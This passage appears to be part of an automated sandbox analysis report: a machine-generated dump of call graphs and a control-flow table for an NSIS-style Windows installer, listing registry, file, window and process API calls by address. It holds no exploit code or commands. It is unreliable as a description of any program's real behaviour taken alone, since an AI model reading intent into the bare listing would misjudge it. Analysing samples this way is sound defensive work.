4343->4351 4345->4346 4346->4339 4347 4054a7 GlobalFree 4346->4347 4347->4339 4350 4052c0 4348->4350 4349->4359 4352 4052c5 ShowWindow 4350->4352 4353 4052dd 4350->4353 4356 405459 SendMessageW 4351->4356 4372 404636 SendMessageW 4352->4372 4373 404636 SendMessageW 4353->4373 4355->4341 4356->4327 4357->4348 4357->4350 4359->4338 4360->4341 4361->4341 4363->4325 4363->4337 4364 4055f3 4365 4055fe InvalidateRect 4364->4365 4368 40560a 4364->4368 4365->4368 4366 405517 SendMessageW 4371 40552d 4366->4371 4367->4366 4367->4371 4368->4342 4388 404f77 4368->4388 4370 4055a1 SendMessageW SendMessageW 4370->4371 4371->4364 4371->4370 4372->4359 4373->4333 4375 40501b SendMessageW 4374->4375 4376 404fdf GetMessagePos ScreenToClient SendMessageW 4374->4376 4377 405013 4375->4377 4376->4377 4378 405018 4376->4378 4377->4363 4378->4375 4391 406682 lstrcpynW 4379->4391 4381 40504f 4392 4065c9 wsprintfW 4381->4392 4383 405059 4384 40140b 2 API calls 4383->4384 4385 405062 4384->4385 4393 406682 lstrcpynW 4385->4393 4387 405069 4387->4367 4394 404eae 4388->4394 4390 404f8c 4390->4342 4391->4381 4392->4383 4393->4387 4395 404ec7 4394->4395 4396 4066bf 21 API calls 4395->4396 4397 404f2b 4396->4397 4398 4066bf 21 API calls 4397->4398 4399 404f36 4398->4399 4400 4066bf 21 API calls 4399->4400 4401 404f4c lstrlenW wsprintfW SetDlgItemTextW 4400->4401 4401->4390 4402 40166f 4403 402dab 21 API calls 4402->4403 4404 401675 4403->4404 4405 4069df 2 API calls 4404->4405 4406 40167b 4405->4406 4407 402af0 4408 402d89 21 API calls 4407->4408 4409 402af6 4408->4409 4410 402933 4409->4410 4411 4066bf 21 API calls 4409->4411 4411->4410 4412 404771 lstrlenW 4413 404790 4412->4413 4414 404792 WideCharToMultiByte 4412->4414 4413->4414 4415 4026f1 4416 402d89 21 API calls 4415->4416 4424 402700 4416->4424 4417 40283d 4418 40274a ReadFile 4418->4417 4418->4424 4419 4061f5 ReadFile 4419->4424 4420 40278a MultiByteToWideChar 4420->4424 4421 40283f 4428 4065c9 wsprintfW 4421->4428 4422 406253 5 API 
calls 4422->4424 4424->4417 4424->4418 4424->4419 4424->4420 4424->4421 4424->4422 4425 4027b0 SetFilePointer MultiByteToWideChar 4424->4425 4426 402850 4424->4426 4425->4424 4426->4417 4427 402871 SetFilePointer 4426->4427 4427->4417 4428->4417 4429 404af2 4430 404b1e 4429->4430 4431 404b2f 4429->4431 4490 405cc6 GetDlgItemTextW 4430->4490 4433 404b3b GetDlgItem 4431->4433 4439 404b9a 4431->4439 4435 404b4f 4433->4435 4434 404b29 4437 406930 5 API calls 4434->4437 4438 404b63 SetWindowTextW 4435->4438 4443 405ffc 4 API calls 4435->4443 4436 404c7e 4440 404e2d 4436->4440 4492 405cc6 GetDlgItemTextW 4436->4492 4437->4431 4444 404601 22 API calls 4438->4444 4439->4436 4439->4440 4445 4066bf 21 API calls 4439->4445 4442 404668 8 API calls 4440->4442 4450 404e41 4442->4450 4451 404b59 4443->4451 4447 404b7f 4444->4447 4448 404c0e SHBrowseForFolderW 4445->4448 4446 404cae 4449 406059 18 API calls 4446->4449 4452 404601 22 API calls 4447->4452 4448->4436 4453 404c26 CoTaskMemFree 4448->4453 4454 404cb4 4449->4454 4451->4438 4457 405f51 3 API calls 4451->4457 4455 404b8d 4452->4455 4456 405f51 3 API calls 4453->4456 4493 406682 lstrcpynW 4454->4493 4491 404636 SendMessageW 4455->4491 4459 404c33 4456->4459 4457->4438 4462 404c6a SetDlgItemTextW 4459->4462 4466 4066bf 21 API calls 4459->4466 4461 404b93 4464 406a76 5 API calls 4461->4464 4462->4436 4463 404ccb 4465 406a76 5 API calls 4463->4465 4464->4439 4473 404cd2 4465->4473 4467 404c52 lstrcmpiW 4466->4467 4467->4462 4470 404c63 lstrcatW 4467->4470 4468 404d13 4494 406682 lstrcpynW 4468->4494 4470->4462 4471 404d1a 4472 405ffc 4 API calls 4471->4472 4474 404d20 GetDiskFreeSpaceW 4472->4474 4473->4468 4477 405f9d 2 API calls 4473->4477 4479 404d6b 4473->4479 4476 404d44 MulDiv 4474->4476 4474->4479 4476->4479 4477->4473 4478 404ddc 4481 404dff 4478->4481 4483 40140b 2 API calls 4478->4483 4479->4478 4480 404f77 24 API calls 4479->4480 4482 404dc9 4480->4482 4495 404623 KiUserCallbackDispatcher 4481->4495 4485 404dde 
SetDlgItemTextW 4482->4485 4486 404dce 4482->4486 4483->4481 4485->4478 4488 404eae 24 API calls 4486->4488 4487 404e1b 4487->4440 4489 404a4b SendMessageW 4487->4489 4488->4478 4489->4440 4490->4434 4491->4461 4492->4446 4493->4463 4494->4471 4495->4487 3424 401774 3425 402dab 21 API calls 3424->3425 3426 40177b 3425->3426 3427 4017a3 3426->3427 3428 40179b 3426->3428 3493 406682 lstrcpynW 3427->3493 3492 406682 lstrcpynW 3428->3492 3431 4017a1 3435 406930 5 API calls 3431->3435 3432 4017ae 3494 405f51 lstrlenW CharPrevW 3432->3494 3449 4017c0 3435->3449 3439 4017d2 CompareFileTime 3439->3449 3440 401892 3466 405707 3440->3466 3442 405707 28 API calls 3445 40187e 3442->3445 3443 406682 lstrcpynW 3443->3449 3448 4018c3 SetFileTime 3450 4018d5 FindCloseChangeNotification 3448->3450 3449->3439 3449->3440 3449->3443 3451 4066bf 21 API calls 3449->3451 3460 401869 3449->3460 3462 40614d GetFileAttributesW 3449->3462 3465 406172 GetFileAttributesW CreateFileW 3449->3465 3497 4069df FindFirstFileW 3449->3497 3500 405ce2 3449->3500 3450->3445 3452 4018e6 3450->3452 3451->3449 3453 4018eb 3452->3453 3454 4018fe 3452->3454 3455 4066bf 21 API calls 3453->3455 3456 4066bf 21 API calls 3454->3456 3458 4018f3 lstrcatW 3455->3458 3459 401906 3456->3459 3458->3459 3461 405ce2 MessageBoxIndirectW 3459->3461 3460->3442 3460->3445 3461->3445 3463 40616c 3462->3463 3464 40615f SetFileAttributesW 3462->3464 3463->3449 3464->3463 3465->3449 3467 405722 3466->3467 3476 40189c 3466->3476 3468 40573e lstrlenW 3467->3468 3469 4066bf 21 API calls 3467->3469 3470 405767 3468->3470 3471 40574c lstrlenW 3468->3471 3469->3468 3473 40577a 3470->3473 3474 40576d SetWindowTextW 3470->3474 3472 40575e lstrcatW 3471->3472 3471->3476 3472->3470 3475 405780 SendMessageW SendMessageW SendMessageW 3473->3475 3473->3476 3474->3473 3475->3476 3477 403376 3476->3477 3478 4033a1 3477->3478 3479 403385 SetFilePointer 3477->3479 3504 40347e GetTickCount 3478->3504 3479->3478 3482 4018af 3482->3448 3482->3450 
3485 40347e 46 API calls 3486 4033d8 3485->3486 3486->3482 3487 403444 ReadFile 3486->3487 3489 4033e7 3486->3489 3487->3482 3489->3482 3490 4061f5 ReadFile 3489->3490 3519 406224 WriteFile 3489->3519 3490->3489 3492->3431 3493->3432 3495 4017b4 lstrcatW 3494->3495 3496 405f6d lstrcatW 3494->3496 3495->3431 3496->3495 3498 406a00 3497->3498 3499 4069f5 FindClose 3497->3499 3498->3449 3499->3498 3501 405cf7 3500->3501 3502 405d43 3501->3502 3503 405d0b MessageBoxIndirectW 3501->3503 3502->3449 3503->3502 3505 4035d6 3504->3505 3506 4034ac 3504->3506 3508 403033 36 API calls 3505->3508 3521 4035fd SetFilePointer 3506->3521 3509 4033a8 3508->3509 3509->3482 3517 4061f5 ReadFile 3509->3517 3510 4034b7 SetFilePointer 3515 4034dc 3510->3515 3514 406224 WriteFile 3514->3515 3515->3509 3515->3514 3516 4035b7 SetFilePointer 3515->3516 3522 4035e7 3515->3522 3525 406bf1 3515->3525 3532 403033 3515->3532 3516->3505 3518 4033c1 3517->3518 3518->3482 3518->3485 3520 406242 3519->3520 3520->3489 3521->3510 3523 4061f5 ReadFile 3522->3523 3524 4035fa 3523->3524 3524->3515 3526 406c16 3525->3526 3527 406c1e 3525->3527 3526->3515 3527->3526 3528 406ca5 GlobalFree 3527->3528 3529 406cae GlobalAlloc 3527->3529 3530 406d25 GlobalAlloc 3527->3530 3531 406d1c GlobalFree 3527->3531 3528->3529 3529->3526 3529->3527 3530->3526 3530->3527 3531->3530 3533 403044 3532->3533 3534 40305c 3532->3534 3535 40304d DestroyWindow 3533->3535 3538 403054 3533->3538 3536 403064 3534->3536 3537 40306c GetTickCount 3534->3537 3535->3538 3547 406ab2 3536->3547 3537->3538 3539 40307a 3537->3539 3538->3515 3541 403082 3539->3541 3542 4030af CreateDialogParamW ShowWindow 3539->3542 3541->3538 3551 403017 3541->3551 3542->3538 3544 403090 wsprintfW 3545 405707 28 API calls 3544->3545 3546 4030ad 3545->3546 3546->3538 3548 406acf PeekMessageW 3547->3548 3549 406ac5 DispatchMessageW 3548->3549 3550 406adf 3548->3550 3549->3548 3550->3538 3552 403026 3551->3552 3553 403028 MulDiv 3551->3553 3552->3553 3553->3544 
4496 4014f5 SetForegroundWindow 4497 402c2f 4496->4497 4498 401a77 4499 402d89 21 API calls 4498->4499 4500 401a80 4499->4500 4501 402d89 21 API calls 4500->4501 4502 401a25 4501->4502 4503 401578 4504 401591 4503->4504 4505 401588 ShowWindow 4503->4505 4506 402c2f 4504->4506 4507 40159f ShowWindow 4504->4507 4505->4504 4507->4506 3998 4023f9 3999 402dab 21 API calls 3998->3999 4000 402408 3999->4000 4001 402dab 21 API calls 4000->4001 4002 402411 4001->4002 4003 402dab 21 API calls 4002->4003 4004 40241b GetPrivateProfileStringW 4003->4004 4508 40567b 4509 40568b 4508->4509 4510 40569f 4508->4510 4512 405691 4509->4512 4513 4056e8 4509->4513 4511 4056a7 IsWindowVisible 4510->4511 4519 4056be 4510->4519 4511->4513 4514 4056b4 4511->4514 4516 40464d SendMessageW 4512->4516 4515 4056ed CallWindowProcW 4513->4515 4517 404fbc 5 API calls 4514->4517 4518 40569b 4515->4518 4516->4518 4517->4519 4519->4515 4520 40503c 4 API calls 4519->4520 4520->4513 4521 401ffb 4522 402dab 21 API calls 4521->4522 4523 402002 4522->4523 4524 4069df 2 API calls 4523->4524 4525 402008 4524->4525 4527 402019 4525->4527 4528 4065c9 wsprintfW 4525->4528 4528->4527 4529 401b7c 4530 402dab 21 API calls 4529->4530 4531 401b83 4530->4531 4532 402d89 21 API calls 4531->4532 4533 401b8c wsprintfW 4532->4533 4534 402c2f 4533->4534 4535 401000 4536 401037 BeginPaint GetClientRect 4535->4536 4537 40100c DefWindowProcW 4535->4537 4539 4010f3 4536->4539 4540 401179 4537->4540 4541 401073 CreateBrushIndirect FillRect DeleteObject 4539->4541 4542 4010fc 4539->4542 4541->4539 4543 401102 CreateFontIndirectW 4542->4543 4544 401167 EndPaint 4542->4544 4543->4544 4545 401112 6 API calls 4543->4545 4544->4540 4545->4544 4546 401680 4547 402dab 21 API calls 4546->4547 4548 401687 4547->4548 4549 402dab 21 API calls 4548->4549 4550 401690 4549->4550 4551 402dab 21 API calls 4550->4551 4552 401699 MoveFileW 4551->4552 4553 4016a5 4552->4553 4554 4016ac 4552->4554 4556 401423 28 API calls 4553->4556 4555 4069df 2 
API calls 4554->4555 4558 4022fb 4554->4558 4557 4016bb 4555->4557 4556->4558 4557->4558 4559 406442 40 API calls 4557->4559 4559->4553 3230 404102 3231 40411a 3230->3231 3232 40427b 3230->3232 3231->3232 3233 404126 3231->3233 3234 4042cc 3232->3234 3235 40428c GetDlgItem GetDlgItem 3232->3235 3237 404131 SetWindowPos 3233->3237 3238 404144 3233->3238 3236 404326 3234->3236 3244 401389 2 API calls 3234->3244 3239 404601 22 API calls 3235->3239 3257 404276 3236->3257 3303 40464d 3236->3303 3237->3238 3241 40414d ShowWindow 3238->3241 3242 40418f 3238->3242 3243 4042b6 SetClassLongW 3239->3243 3245 404268 3241->3245 3246 40416d GetWindowLongW 3241->3246 3247 404197 DestroyWindow 3242->3247 3248 4041ae 3242->3248 3249 40140b 2 API calls 3243->3249 3252 4042fe 3244->3252 3342 404668 3245->3342 3246->3245 3254 404186 ShowWindow 3246->3254 3302 40458a 3247->3302 3250 4041b3 SetWindowLongW 3248->3250 3251 4041c4 3248->3251 3249->3234 3250->3257 3251->3245 3255 4041d0 GetDlgItem 3251->3255 3252->3236 3256 404302 SendMessageW 3252->3256 3254->3242 3260 4041e1 SendMessageW IsWindowEnabled 3255->3260 3261 4041fe 3255->3261 3256->3257 3258 40140b 2 API calls 3269 404338 3258->3269 3259 40458c DestroyWindow EndDialog 3259->3302 3260->3257 3260->3261 3264 40420b 3261->3264 3266 404252 SendMessageW 3261->3266 3267 40421e 3261->3267 3276 404203 3261->3276 3262 4045bb ShowWindow 3262->3257 3264->3266 3264->3276 3266->3245 3270 404226 3267->3270 3271 40423b 3267->3271 3268 404239 3268->3245 3269->3257 3269->3258 3269->3259 3272 404601 22 API calls 3269->3272 3293 4044cc DestroyWindow 3269->3293 3306 4066bf 3269->3306 3323 404601 3269->3323 3336 40140b 3270->3336 3273 40140b 2 API calls 3271->3273 3272->3269 3275 404242 3273->3275 3275->3245 3275->3276 3339 4045da 3276->3339 3278 4043b3 GetDlgItem 3279 4043d0 ShowWindow KiUserCallbackDispatcher 3278->3279 3280 4043c8 3278->3280 3326 404623 KiUserCallbackDispatcher 3279->3326 3280->3279 3282 4043fa EnableWindow 3287 40440e 3282->3287 
3283 404413 GetSystemMenu EnableMenuItem SendMessageW 3284 404443 SendMessageW 3283->3284 3283->3287 3284->3287 3287->3283 3327 404636 SendMessageW 3287->3327 3328 4040e3 3287->3328 3331 406682 lstrcpynW 3287->3331 3289 404472 lstrlenW 3290 4066bf 21 API calls 3289->3290 3291 404488 SetWindowTextW 3290->3291 3332 401389 3291->3332 3294 4044e6 CreateDialogParamW 3293->3294 3293->3302 3295 404519 3294->3295 3294->3302 3296 404601 22 API calls 3295->3296 3297 404524 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3296->3297 3298 401389 2 API calls 3297->3298 3299 40456a 3298->3299 3299->3257 3300 404572 ShowWindow 3299->3300 3301 40464d SendMessageW 3300->3301 3301->3302 3302->3257 3302->3262 3304 404665 3303->3304 3305 404656 SendMessageW 3303->3305 3304->3269 3305->3304 3321 4066ca 3306->3321 3307 406911 3308 40692a 3307->3308 3378 406682 lstrcpynW 3307->3378 3308->3269 3310 4068e2 lstrlenW 3310->3321 3314 4067db GetSystemDirectoryW 3314->3321 3315 4066bf 15 API calls 3315->3310 3316 4067f1 GetWindowsDirectoryW 3316->3321 3318 4066bf 15 API calls 3318->3321 3319 406883 lstrcatW 3319->3321 3321->3307 3321->3310 3321->3314 3321->3315 3321->3316 3321->3318 3321->3319 3322 406853 SHGetPathFromIDListW CoTaskMemFree 3321->3322 3356 406a76 GetModuleHandleA 3321->3356 3362 406550 3321->3362 3367 406930 3321->3367 3376 4065c9 wsprintfW 3321->3376 3377 406682 lstrcpynW 3321->3377 3322->3321 3324 4066bf 21 API calls 3323->3324 3325 40460c SetDlgItemTextW 3324->3325 3325->3278 3326->3282 3327->3287 3329 4066bf 21 API calls 3328->3329 3330 4040f1 SetWindowTextW 3329->3330 3330->3287 3331->3289 3334 401390 3332->3334 3333 4013fe 3333->3269 3334->3333 3335 4013cb MulDiv SendMessageW 3334->3335 3335->3334 3337 401389 2 API calls 3336->3337 3338 401420 3337->3338 3338->3276 3340 4045e1 3339->3340 3341 4045e7 SendMessageW 3339->3341 3340->3341 3341->3268 3343 40472b 3342->3343 3344 404680 GetWindowLongW 3342->3344 3343->3257 3344->3343 3345 404695 3344->3345 3345->3343 3346 
4046c2 GetSysColor 3345->3346 3347 4046c5 3345->3347 3346->3347 3348 4046d5 SetBkMode 3347->3348 3349 4046cb SetTextColor 3347->3349 3350 4046f3 3348->3350 3351 4046ed GetSysColor 3348->3351 3349->3348 3352 4046fa SetBkColor 3350->3352 3353 404704 3350->3353 3351->3350 3352->3353 3353->3343 3354 404717 DeleteObject 3353->3354 3355 40471e CreateBrushIndirect 3353->3355 3354->3355 3355->3343 3357 406a92 3356->3357 3358 406a9c GetProcAddress 3356->3358 3379 406a06 GetSystemDirectoryW 3357->3379 3360 406aab 3358->3360 3360->3321 3361 406a98 3361->3358 3361->3360 3382 4064ef 3362->3382 3365 4065b4 3365->3321 3366 406584 RegQueryValueExW RegCloseKey 3366->3365 3368 40693d 3367->3368 3370 4069a6 CharNextW 3368->3370 3371 4069b3 3368->3371 3374 406992 CharNextW 3368->3374 3375 4069a1 CharNextW 3368->3375 3386 405f7e 3368->3386 3369 4069b8 CharPrevW 3369->3371 3370->3368 3370->3371 3371->3369 3372 4069d9 3371->3372 3372->3321 3374->3368 3375->3370 3376->3321 3377->3321 3378->3308 3380 406a28 wsprintfW LoadLibraryExW 3379->3380 3380->3361 3383 4064fe 3382->3383 3384 406502 3383->3384 3385 406507 RegOpenKeyExW 3383->3385 3384->3365 3384->3366 3385->3384 3387 405f84 3386->3387 3388 405f9a 3387->3388 3389 405f8b CharNextW 3387->3389 3388->3368 3389->3387 4560 401503 4561 401508 4560->4561 4563 401520 4560->4563 4562 402d89 21 API calls 4561->4562 4562->4563 4564 401a04 4565 402dab 21 API calls 4564->4565 4566 401a0b 4565->4566 4567 402dab 21 API calls 4566->4567 4568 401a14 4567->4568 4569 401a1b lstrcmpiW 4568->4569 4570 401a2d lstrcmpW 4568->4570 4571 401a21 4569->4571 4570->4571 4572 402304 4573 402dab 21 API calls 4572->4573 4574 40230a 4573->4574 4575 402dab 21 API calls 4574->4575 4576 402313 4575->4576 4577 402dab 21 API calls 4576->4577 4578 40231c 4577->4578 4579 4069df 2 API calls 4578->4579 4580 402325 4579->4580 4581 402336 lstrlenW lstrlenW 4580->4581 4585 402329 4580->4585 4583 405707 28 API calls 4581->4583 4582 405707 28 API calls 4586 402331 4582->4586 4584 
402374 SHFileOperationW 4583->4584 4584->4585 4584->4586 4585->4582 4585->4586 4594 401d86 4595 401d99 GetDlgItem 4594->4595 4596 401d8c 4594->4596 4598 401d93 4595->4598 4597 402d89 21 API calls 4596->4597 4597->4598 4599 401dda GetClientRect LoadImageW SendMessageW 4598->4599 4600 402dab 21 API calls 4598->4600 4602 401e38 4599->4602 4604 401e44 4599->4604 4600->4599 4603 401e3d DeleteObject 4602->4603 4602->4604 4603->4604 4605 402388 4606 40238f 4605->4606 4609 4023a2 4605->4609 4607 4066bf 21 API calls 4606->4607 4608 40239c 4607->4608 4610 405ce2 MessageBoxIndirectW 4608->4610 4610->4609 4611 402c0a SendMessageW 4612 402c24 InvalidateRect 4611->4612 4613 402c2f 4611->4613 4612->4613 4614 40248f 4615 402dab 21 API calls 4614->4615 4616 4024a1 4615->4616 4617 402dab 21 API calls 4616->4617 4618 4024ab 4617->4618 4631 402e3b 4618->4631 4621 4024e3 4624 4024ef 4621->4624 4625 402d89 21 API calls 4621->4625 4622 402933 4623 402dab 21 API calls 4627 4024d9 lstrlenW 4623->4627 4626 40250e RegSetValueExW 4624->4626 4628 403376 48 API calls 4624->4628 4625->4624 4629 402524 RegCloseKey 4626->4629 4627->4621 4628->4626 4629->4622 4632 402e56 4631->4632 4635 40651d 4632->4635 4636 40652c 4635->4636 4637 4024bb 4636->4637 4638 406537 RegCreateKeyExW 4636->4638 4637->4621 4637->4622 4637->4623 4638->4637 4639 402910 4640 402dab 21 API calls 4639->4640 4641 402917 FindFirstFileW 4640->4641 4642 40292a 4641->4642 4643 40293f 4641->4643 4647 4065c9 wsprintfW 4643->4647 4645 402948 4648 406682 lstrcpynW 4645->4648 4647->4645 4648->4642 4649 401911 4650 401948 4649->4650 4651 402dab 21 API calls 4650->4651 4652 40194d 4651->4652 4653 405d8e 71 API calls 4652->4653 4654 401956 4653->4654 4655 401491 4656 405707 28 API calls 4655->4656 4657 401498 4656->4657 4658 403d12 4659 403d1d 4658->4659 4660 403d21 4659->4660 4661 403d24 GlobalAlloc 4659->4661 4661->4660 4669 401914 4670 402dab 21 API calls 4669->4670 4671 40191b 4670->4671 4672 405ce2 MessageBoxIndirectW 4671->4672 4673 
401924 4672->4673 4674 402896 4675 40289d 4674->4675 4676 402bae 4674->4676 4677 402d89 21 API calls 4675->4677 4678 4028a4 4677->4678 4679 4028b3 SetFilePointer 4678->4679 4679->4676 4680 4028c3 4679->4680 4682 4065c9 wsprintfW 4680->4682 4682->4676 4683 401f17 4684 402dab 21 API calls 4683->4684 4685 401f1d 4684->4685 4686 402dab 21 API calls 4685->4686 4687 401f26 4686->4687 4688 402dab 21 API calls 4687->4688 4689 401f2f 4688->4689 4690 402dab 21 API calls 4689->4690 4691 401f38 4690->4691 4692 401423 28 API calls 4691->4692 4693 401f3f 4692->4693 4700 405ca8 ShellExecuteExW 4693->4700 4695 401f87 4696 406b21 5 API calls 4695->4696 4697 402933 4695->4697 4698 401fa4 CloseHandle 4696->4698 4698->4697 4700->4695 4701 402f98 4702 402faa SetTimer 4701->4702 4704 402fc3 4701->4704 4702->4704 4703 403011 4704->4703 4705 403017 MulDiv 4704->4705 4706 402fd1 wsprintfW SetWindowTextW SetDlgItemTextW 4705->4706 4706->4703 4708 401d1c 4709 402d89 21 API calls 4708->4709 4710 401d22 IsWindow 4709->4710 4711 401a25 4710->4711 4712 40149e 4713 4023a2 4712->4713 4714 4014ac PostQuitMessage 4712->4714 4714->4713 4715 401ba0 4716 401bf1 4715->4716 4720 401bad 4715->4720 4717 401c1b GlobalAlloc 4716->4717 4721 401bf6 4716->4721 4718 4066bf 21 API calls 4717->4718 4722 401c36 4718->4722 4719 4066bf 21 API calls 4723 40239c 4719->4723 4720->4722 4724 401bc4 4720->4724 4728 4023a2 4721->4728 4736 406682 lstrcpynW 4721->4736 4722->4719 4722->4728 4730 405ce2 MessageBoxIndirectW 4723->4730 4734 406682 lstrcpynW 4724->4734 4727 401c08 GlobalFree 4727->4728 4729 401bd3 4735 406682 lstrcpynW 4729->4735 4730->4728 4732 401be2 4737 406682 lstrcpynW 4732->4737 4734->4729 4735->4732 4736->4727 4737->4728 4738 406da0 4742 406c24 4738->4742 4739 40758f 4740 406ca5 GlobalFree 4741 406cae GlobalAlloc 4740->4741 4741->4739 4741->4742 4742->4739 4742->4740 4742->4741 4743 406d25 GlobalAlloc 4742->4743 4744 406d1c GlobalFree 4742->4744 4743->4739 4743->4742 4744->4743 4745 402621 4746 402dab 21 
API calls 4745->4746 4747 402628 4746->4747 4750 406172 GetFileAttributesW CreateFileW 4747->4750 4749 402634 4750->4749 3401 4025a3 3413 402deb 3401->3413 3404 402d89 21 API calls 3405 4025b6 3404->3405 3406 4025c5 3405->3406 3410 402933 3405->3410 3407 4025d2 RegEnumKeyW 3406->3407 3408 4025de RegEnumValueW 3406->3408 3411 4025fa RegCloseKey 3407->3411 3409 4025f3 3408->3409 3408->3411 3409->3411 3411->3410 3418 402dab 3413->3418 3415 402e02 3416 4064ef RegOpenKeyExW 3415->3416 3417 4025ad 3416->3417 3417->3404 3419 402db7 3418->3419 3420 4066bf 21 API calls 3419->3420 3421 402dd8 3420->3421 3422 402de4 3421->3422 3423 406930 5 API calls 3421->3423 3422->3415 3423->3422 4751 4015a8 4752 402dab 21 API calls 4751->4752 4753 4015af SetFileAttributesW 4752->4753 4754 4015c1 4753->4754 4005 401fa9 4006 402dab 21 API calls 4005->4006 4007 401faf 4006->4007 4008 405707 28 API calls 4007->4008 4009 401fb9 4008->4009 4010 405c65 2 API calls 4009->4010 4011 401fbf 4010->4011 4012 402933 4011->4012 4019 401fe2 CloseHandle 4011->4019 4020 406b21 WaitForSingleObject 4011->4020 4015 401fd4 4016 401fe4 4015->4016 4017 401fd9 4015->4017 4016->4019 4025 4065c9 wsprintfW 4017->4025 4019->4012 4021 406b3b 4020->4021 4022 406b4d GetExitCodeProcess 4021->4022 4023 406ab2 2 API calls 4021->4023 4022->4015 4024 406b42 WaitForSingleObject 4023->4024 4024->4021 4025->4019 4762 404aab 4763 404ae1 4762->4763 4764 404abb 4762->4764 4766 404668 8 API calls 4763->4766 4765 404601 22 API calls 4764->4765 4767 404ac8 SetDlgItemTextW 4765->4767 4768 404aed 4766->4768 4767->4763 4026 40252f 4027 402deb 21 API calls 4026->4027 4028 402539 4027->4028 4029 402dab 21 API calls 4028->4029 4030 402542 4029->4030 4031 40254d RegQueryValueExW 4030->4031 4035 402933 4030->4035 4032 402573 RegCloseKey 4031->4032 4033 40256d 4031->4033 4032->4035 4033->4032 4037 4065c9 wsprintfW 4033->4037 4037->4032 4769 40202f 4770 402dab 21 API calls 4769->4770 4771 402036 4770->4771 4772 406a76 5 API calls 4771->4772 
4773 402045 4772->4773 4774 402061 GlobalAlloc 4773->4774 4776 4020d1 4773->4776 4775 402075 4774->4775 4774->4776 4777 406a76 5 API calls 4775->4777 4778 40207c 4777->4778 4779 406a76 5 API calls 4778->4779 4780 402086 4779->4780 4780->4776 4784 4065c9 wsprintfW 4780->4784 4782 4020bf 4785 4065c9 wsprintfW 4782->4785 4784->4782 4785->4776 4786 4021af 4787 402dab 21 API calls 4786->4787 4788 4021b6 4787->4788 4789 402dab 21 API calls 4788->4789 4790 4021c0 4789->4790 4791 402dab 21 API calls 4790->4791 4792 4021ca 4791->4792 4793 402dab 21 API calls 4792->4793 4794 4021d4 4793->4794 4795 402dab 21 API calls 4794->4795 4796 4021de 4795->4796 4797 40221d CoCreateInstance 4796->4797 4798 402dab 21 API calls 4796->4798 4799 40223c 4797->4799 4798->4797 4800 401423 28 API calls 4799->4800 4801 4022fb 4799->4801 4800->4801 4802 401a35 4803 402dab 21 API calls 4802->4803 4804 401a3e ExpandEnvironmentStringsW 4803->4804 4805 401a52 4804->4805 4807 401a65 4804->4807 4806 401a57 lstrcmpW 4805->4806 4805->4807 4806->4807 3988 4023b7 3989 4023c5 3988->3989 3990 4023bf 3988->3990 3992 4023d3 3989->3992 3994 402dab 21 API calls 3989->3994 3991 402dab 21 API calls 3990->3991 3991->3989 3993 4023e1 3992->3993 3995 402dab 21 API calls 3992->3995 3996 402dab 21 API calls 3993->3996 3994->3992 3995->3993 3997 4023ea WritePrivateProfileStringW 3996->3997 4808 404737 lstrcpynW lstrlenW 4814 4014b8 4815 4014be 4814->4815 4816 401389 2 API calls 4815->4816 4817 4014c6 4816->4817 4818 402439 4819 402441 4818->4819 4820 40246c 4818->4820 4821 402deb 21 API calls 4819->4821 4822 402dab 21 API calls 4820->4822 4823 402448 4821->4823 4824 402473 4822->4824 4826 402480 4823->4826 4827 402dab 21 API calls 4823->4827 4829 402e69 4824->4829 4828 402459 RegDeleteValueW RegCloseKey 4827->4828 4828->4826 4830 402e7d 4829->4830 4831 402e76 4829->4831 4830->4831 4833 402eae 4830->4833 4831->4826 4834 4064ef RegOpenKeyExW 4833->4834 4835 402edc 4834->4835 4836 402f86 4835->4836 4837 402eec 
RegEnumValueW 4835->4837 4841 402f0f 4835->4841 4836->4831 4838 402f76 RegCloseKey 4837->4838 4837->4841 4838->4836 4839 402f4b RegEnumKeyW 4840 402f54 RegCloseKey 4839->4840 4839->4841 4842 406a76 5 API calls 4840->4842 4841->4838 4841->4839 4841->4840 4843 402eae 6 API calls 4841->4843 4844 402f64 4842->4844 4843->4841 4844->4836 4845 402f68 RegDeleteKeyW 4844->4845 4845->4836 4846 40173a 4847 402dab 21 API calls 4846->4847 4848 401741 SearchPathW 4847->4848 4849 40175c 4848->4849 4850 401d3d 4851 402d89 21 API calls 4850->4851 4852 401d44 4851->4852 4853 402d89 21 API calls 4852->4853 4854 401d50 GetDlgItem 4853->4854 4855 40263d 4854->4855

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 403645-403697 SetErrorMode GetVersionExW 1 4036d1-4036d6 0->1 2 403699-4036c9 GetVersionExW 0->2 3 4036d8 1->3 4 4036de-403720 1->4 2->1 3->4 5 403722-40372a call 406a76 4->5 6 403733 4->6 5->6 11 40372c 5->11 8 403738-40374c call 406a06 lstrlenA 6->8 13 40374e-40376a call 406a76 * 3 8->13 11->6 20 40377b-4037df #17 OleInitialize SHGetFileInfoW call 406682 GetCommandLineW call 406682 13->20 21 40376c-403772 13->21 28 4037e1-4037e3 20->28 29 4037e8-4037fc call 405f7e CharNextW 20->29 21->20 25 403774 21->25 25->20 28->29 32 4038f7-4038fd 29->32 33 403801-403807 32->33 34 403903 32->34 35 403810-403817 33->35 36 403809-40380e 33->36 37 403917-403931 GetTempPathW call 403614 34->37 38 403819-40381e 35->38 39 40381f-403823 35->39 36->35 36->36 47 403933-403951 GetWindowsDirectoryW lstrcatW call 403614 37->47 48 403989-4039a3 DeleteFileW call 4030d5 37->48 38->39 41 4038e4-4038f3 call 405f7e 39->41 42 403829-40382f 39->42 41->32 59 4038f5-4038f6 41->59 45 403831-403838 42->45 46 403849-403882 42->46 52 40383a-40383d 45->52 53 40383f 45->53 54 403884-403889 46->54 55 40389f-4038d9 46->55 47->48 62 403953-403983 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403614 47->62 64 403b90-403ba0 call 403c62 OleUninitialize 48->64 65 4039a9-4039af 48->65 52->46 52->53 53->46 54->55 61 40388b-403893 54->61 57 4038e1-4038e3 55->57 58 4038db-4038df 55->58 57->41 58->57 63 403905-403912 call 406682 58->63 59->32 66 403895-403898 61->66 67 40389a 61->67 62->48 62->64 63->37 77 403ba2-403bb2 call 405ce2 ExitProcess 64->77 78 403bc6-403bcc 64->78 70 4039b5-4039c0 call 405f7e 65->70 71 403a48-403a4f call 403d54 65->71 66->55 66->67 67->55 82 4039c2-4039f7 70->82 83 403a0e-403a18 70->83 80 403a54-403a58 71->80 84 403c4a-403c52 78->84 85 403bce-403be4 GetCurrentProcess OpenProcessToken 78->85 80->64 91 4039f9-4039fd 82->91 86 403a1a-403a28 call 406059 83->86 